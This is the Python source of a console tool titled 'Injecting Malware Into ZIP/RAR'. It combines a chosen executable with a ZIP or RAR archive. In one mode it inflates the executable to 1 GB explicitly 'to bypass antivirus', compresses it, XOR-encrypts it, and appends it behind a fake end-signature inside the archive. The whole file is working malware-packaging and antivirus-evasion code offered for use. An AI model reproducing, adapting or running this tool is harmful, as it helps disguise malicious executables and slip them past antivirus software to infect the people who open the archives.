InjectingMalwareIntoZIPRAR.py

#######################################################################################
#
#   InjectingMalwareIntoZIPRAR.py (Injecting Malware Into ZIP/RAR File) [ Main Program ]
#   © 2022 ABDULKADİR GÜNGÖR All Rights Reserved
#   Contact email address: abdulkadir_gungor@outlook.com
#
#	Developper:	Abdulkadir GÜNGÖR (abdulkadir_gungor@outlook.com)
#	Date:	05/2022
#	All Rights Reserved (Tüm Hakları Saklıdır)
#
#######################################################################################
from colorama import init, Fore, Back
from ctypes import Structure, c_int, byref, windll
import time, os, bz2
#
#
#
class SETTINGS():
    PROGRAM_NAME      = "Injecting Malware Into Winzip/Winrar"
    RAR_or_ZIP_FILE   = 'document.zip'
    EXE_FILE          = "malware.exe"
    OUT_FILE          = "malware"
    MODE              = 0
    PUPLIC_KEY        = b'!AbdUlkadiR%+39608]gunGor[{'
    PRIVATE_NUMBER    = 19
    BUFFER            = 1024
    FILL_SIZE         = 1073741824  # 1024x1024x1024 (1 GB)
    WAIT_TIME         = 0.1
#
#
#
def setCursor(visible:bool=True):
    class CONSOLE_CURSOR_INFO(Structure):
        _fields_ = [('dwSize', c_int),
                    ('bVisible', c_int)]
    STD_OUTPUT_HANDLE = -11
    hStdOut = windll.kernel32.GetStdHandle(STD_OUTPUT_HANDLE)
    cursorInfo = CONSOLE_CURSOR_INFO()
    cursorInfo.dwSize = 1
    if visible:
        cursorInfo.bVisible = 1
    else:
        cursorInfo.bVisible = 0
    windll.kernel32.SetConsoleCursorInfo(hStdOut, byref(cursorInfo))
#
def strOK():
    return '['+Back.GREEN+Fore.LIGHTWHITE_EX+'OK!'+Back.BLACK+Fore.WHITE+']'
#
def strERROR():
    return '['+Back.RED+Fore.LIGHTWHITE_EX+'ERROR!'+Back.BLACK+Fore.WHITE+']'
#
def strCHECK():
    return '['+Back.YELLOW+Fore.LIGHTWHITE_EX+'CHECK!'+Back.BLACK+Fore.WHITE+']'
#
def consoleTitle(title:str):
    os.system("echo off")
    os.system("title {title}".format(title=title))
#
def consoleClear():
    os.system("echo off")
    os.system("cls")
#
def bytesXOR(plain_text, public_key, private_number):
    public_number = 3
    private_key = b'#$0aSpYt3ehR7%|\&/*QVzX12}-'
    len_key = len(public_key)
    public_encoded = []
    result_encoded = []
    return_encoded = []
    for i in range(0, len(plain_text)):
        public_encoded.append(plain_text[i] ^ public_key[ (i+public_number) % len_key])
    private_encoded = bytes([b ^ len(private_key) for b in (bytes(public_encoded))])
    for i in range(0, len(private_encoded)):
        result_encoded.append(private_encoded[i] ^ private_key[ (i+private_number) % len_key])
    for i in range(0, len(result_encoded)):
        return_encoded.append(result_encoded[i] ^ public_key[ (i+public_number) % len_key])
    return bytes(return_encoded)
#
def screenEntry():
    line_c     = Fore.MAGENTA
    default_c  = Fore.LIGHTWHITE_EX
    tag_c      = Fore.CYAN
    print('')
    print( '\t'+line_c+'/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\' )
    print( '\t'+line_c+'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/')
    print( '\t'+line_c+'/\/\\'+default_c+'                                                      '+line_c+'/\/\\')
    print( '\t'+line_c+'\/\/ '+tag_c+'<Program>'+default_c+' Injecting Malware Into ZIP/RAR  '+tag_c+'</Program> '+line_c+'\/\/')
    print( '\t'+line_c+'/\/\\               '+tag_c+'<Date>'+default_c+'  05/2022 '+tag_c+'</Date>                '+line_c+'/\/\\')
    print( '\t'+line_c+'\/\/'+default_c+'                                                      '+line_c+'\/\/')
    print( '\t'+line_c+'/\/\\      '+tag_c+'<Developer>'+default_c+' Abdulkadir GÜNGÖR '+tag_c+'</Developer>      '+line_c+'/\/\\')
    print( '\t'+line_c+'\/\/   '+tag_c+'<Email>'+default_c+'  abdulkadir_gungor@outlook.com '+tag_c+'</Email>    '+line_c+'\/\/')
    print( '\t'+line_c+'/\/\\'+default_c+'                                                      '+line_c+'/\/\\')
    print( '\t'+line_c+'\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/')
    print( '\t'+line_c+'/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\\')
    print('')
#
def textUpdate(text:str, type:str, newline:bool=False):
    setCursor(visible=False)
    text_long = 63
    #
    if newline:
        print()
    symbol = strCHECK() + " "
    if type.lower() == 'error':
        symbol = strERROR() + " "
    elif type.lower() == 'ok':
        symbol = "   "+strOK() + " "
    elif type.lower() == 'check':
        symbol = strCHECK() + " "
    tmp_str_format = "{0: <" + str(text_long) + "}"
    txt_str = tmp_str_format.format(str(text))
    #
    print(''' %s%s''' % (symbol,txt_str), end='\r')
#
def malwareIntoJPG(settings):
    # ---(0)--- // Variable(s)
    textUpdate('Preparing the function',type='check',newline=True)
    file_0 = "check_write_access.bin"
    file_1 = "buffer_0.bin"
    file_2 = "buffer_1.bin"
    file_3 = 'buffer_2.bin'
    RAR = b'\x52\x61\x72'
    ZIP = b'\x50\x4b'
    permission_check = True
    extension  = (settings.RAR_or_ZIP_FILE[-4:]).lower()
    fill_bytes = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'           # 16 byte(s)
    end_signature_bytes =  fill_bytes + b'\xff\xff\xff\xff\xaa\xaa\xaa\xaa\xbb\xbb\xbb\xbb\xff\xff\xff\xff' + fill_bytes  #48 byte(s)
    time.sleep(settings.WAIT_TIME)
    textUpdate('The function is working', type='ok')
    textUpdate('Checking the existence of files and permissions', type='check', newline=True)
    # ---(1)--- // Checking permissions
    check_zip_rar_exist = os.access( settings.RAR_or_ZIP_FILE, os.F_OK)
    check_exe_exist = os.access( settings.EXE_FILE, os.F_OK)
    check_zip_rar_read  = os.access( settings.RAR_or_ZIP_FILE, os.R_OK)
    check_exe_read  = os.access( settings.EXE_FILE, os.R_OK)
    try:
        tmp0 = open(file=file_0, mode='wb')
        tmp0.close()
    except:
        permission_check = False
    check_buffer_exist = os.access( file_0, os.F_OK)
    check_buffer_write = os.access( file_0, os.W_OK)
    if check_buffer_exist:
        try:
            os.remove(file_0)
        except:
            permission_check = False
    #
    if not check_zip_rar_exist:
        textUpdate('The ZIP/RAR file not found', type='error')
        return False
    if not check_exe_exist:
        textUpdate('The EXE file not found', type='error')
        return False
    if not check_zip_rar_read:
        textUpdate('The ZIP/RAR file could not be opened', type='error')
        return False
    if not check_exe_read:
        textUpdate('The EXE file could not be opened', type='error')
        return False
    if not check_buffer_exist:
        textUpdate('The BUFFER file could not be created', type='error')
        return False
    if not check_buffer_write:
        textUpdate('No write permission to the BUFFER file', type='error')
        return False
    if not permission_check:
        textUpdate('Error occurred with permissions', type='error')
        return False
    del check_exe_exist, check_exe_read, check_zip_rar_exist, check_zip_rar_read
    del check_buffer_exist, check_buffer_write, permission_check, file_0
    time.sleep(settings.WAIT_TIME)
    textUpdate('The files and permissions are available', type='ok')
    # ---(2)--- // Checking the rar/zip file
    textUpdate('Checking the ZIP/RAR file structure', type='check', newline=True)
    if extension == ".zip":
        with open(file=settings.RAR_or_ZIP_FILE, mode='rb') as readfile:
            first_bytes = readfile.read(2)
        if first_bytes != ZIP:
            textUpdate('The ZIP file structure is not suitable', type='error')
            return False
        del ZIP, RAR, first_bytes
    elif extension == ".rar":
        with open(file=settings.RAR_or_ZIP_FILE, mode='rb') as readfile:
            first_bytes = readfile.read(3)
        if first_bytes != RAR:
            textUpdate('The RAR file structure is not suitable', type='error')
            return False
        del ZIP, RAR, first_bytes
    else:
        textUpdate('Could not identify the file', type='error')
        return False
    time.sleep(settings.WAIT_TIME)
    textUpdate('The ZIP/RAR file structure is suitable', type='ok')
    #
    if settings.MODE == 0:
        # ---(3)--- // Generating the ZIP/RAR file containing malware
        time.sleep(settings.WAIT_TIME)
        textUpdate('Generating the ZIP/RAR file containing malware', type='check', newline=True)
        outName = settings.OUT_FILE + extension[-3:].upper() + extension
        with open(file=outName, mode='wb') as wfile:
            with open(settings.EXE_FILE, mode='rb') as rfile:
                while True:
                    data = rfile.read(settings.BUFFER)
                    if data == b'':
                        break
                    wfile.write(data)
            with open(settings.RAR_or_ZIP_FILE, mode='rb') as rfile:
                while True:
                    data = rfile.read(settings.BUFFER)
                    if data == b'':
                        break
                    wfile.write(data)
        del outName, extension
        time.sleep(settings.WAIT_TIME)
        textUpdate('The ZIP/RAR file containing malware was created', type='ok')
        return True
    elif settings.MODE == 1:
        # ---(4)--- // Increasing exe file size to bypass antivirus
        textUpdate('Increasing the EXE file size to bypass antivirus [1GB]', type='check', newline=True)
        try:
            with open(file=file_1, mode='wb') as wfile:
                with open(file=settings.EXE_FILE, mode='rb') as rfile:
                    rfile_size = rfile.seek(0, 2)
                    rfile.seek(0, 0)
                    while True:
                        tmp = rfile.read(settings.BUFFER)
                        if tmp == b'':
                            break
                        wfile.write(tmp)
                for tmp in range(int(((settings.FILL_SIZE - rfile_size) / 16) - 1)):
                    wfile.write(fill_bytes)
                del rfile_size, fill_bytes
            textUpdate('The EXE file size is increased to bypass antivirus [1GB]', type='ok')
        except:
            textUpdate('Increasing the EXE file size to bypass antivirus [1GB]', type='error')
            return False
        # ---(5)--- // The EXE file is compressed.
        textUpdate('Compressing the EXE file', type='check', newline=True)
        try:
            with open(file_1, mode='rb') as rfile:
                with bz2.open(filename=file_2, mode='wb', compresslevel=9) as wfile:
                    while True:
                        data = rfile.read(settings.BUFFER)
                        if data == b'':
                            break
                        wfile.write(data)
            os.remove(file_1)
            textUpdate('The EXE file is compressed', type='ok')
        except:
            textUpdate('Compressing the EXE file', type='error')
            return False
        # ---(7)--- // Encrypting the EXE file
        try:
            textUpdate('Encrypting the EXE file', type='check', newline=True)
            with open(file_2, mode='rb') as rfile:
                with open(file_3, mode='wb') as wfile:
                    while True:
                        data = rfile.read(settings.BUFFER)
                        if data == b'':
                            break
                        wfile.write(bytesXOR(data, settings.PUPLIC_KEY, settings.PRIVATE_NUMBER))
            os.remove(file_2)
            time.sleep(settings.WAIT_TIME)
            textUpdate('The EXE file is encrypted', type='ok')
        except:
            textUpdate('Encrypting the EXE file', type='error')
            return False
        # ---(8)--- // Generating the ZIP/RAR file containing malware
        time.sleep(settings.WAIT_TIME)
        textUpdate('Generating the ZIP/RAR file containing malware', type='check', newline=True)
        outName = settings.OUT_FILE + extension[-3:].upper() + extension
        with open(file=outName, mode='wb') as wfile:
            with open(settings.RAR_or_ZIP_FILE, mode='rb') as rfile:
                while True:
                    data = rfile.read(settings.BUFFER)
                    if data == b'':
                        break
                    wfile.write(data)
            wfile.write(end_signature_bytes) # Zip/Rar End Signature
            with open(file=file_3, mode='rb') as rfile:
                while True:
                    data = rfile.read(settings.BUFFER)
                    if data == b'':
                        break
                    wfile.write(data)
        os.remove(file_3)
        del outName, extension, file_3
        time.sleep(settings.WAIT_TIME)
        textUpdate('The ZIP/RAR file containing malware was created', type='ok')
        return True
    else:
        textUpdate('The MODE variable is an incorrect value', type='error')
        return False
#
###--- Main ---###
if __name__ == '__main__':
    consoleTitle(SETTINGS.PROGRAM_NAME)
    consoleClear()
    init(autoreset=True)
    setCursor(visible=False)
    while True:
        consoleClear()
        screenEntry()
        print()
        setCursor(visible=True)
        SETTINGS.RAR_or_ZIP_FILE = (input("    " + Fore.LIGHTWHITE_EX + "[ZIP/RAR]      Filename :" + Fore.WHITE + " ")).strip()
        SETTINGS.EXE_FILE        = (input("    "+Fore.LIGHTWHITE_EX+    "[EXE]          Filename :"+Fore.WHITE+" ")).strip()
        tmp = (input("    " + Fore.LIGHTWHITE_EX +                      "[0,1] (Default 0)  Mode :" + Fore.WHITE + " ")).strip()
        if tmp is not None and tmp != "":
            default_mode = SETTINGS.MODE
            try:
                SETTINGS.MODE = int(tmp)
            except:
                SETTINGS.MODE = default_mode
                del  default_mode
        #
        setCursor(visible=False)
        res = malwareIntoJPG(SETTINGS)
        print()
        print()
        if res:
            print("    "+Back.GREEN+Fore.LIGHTWHITE_EX+"      "+"OK!"+"      " )
        else:
            print("    "+Back.RED+Fore.LIGHTWHITE_EX+"      "+"ERROR!"+"      " )
        print()
        print()
        setCursor(visible=True)
        selection = input("    "+Fore.LIGHTWHITE_EX+"[Exit <E>] [Continue <Enter>]\n    Selection:"+Fore.WHITE+" ")
        setCursor(visible=False)
        if (selection.strip()).lower() == "e":
            break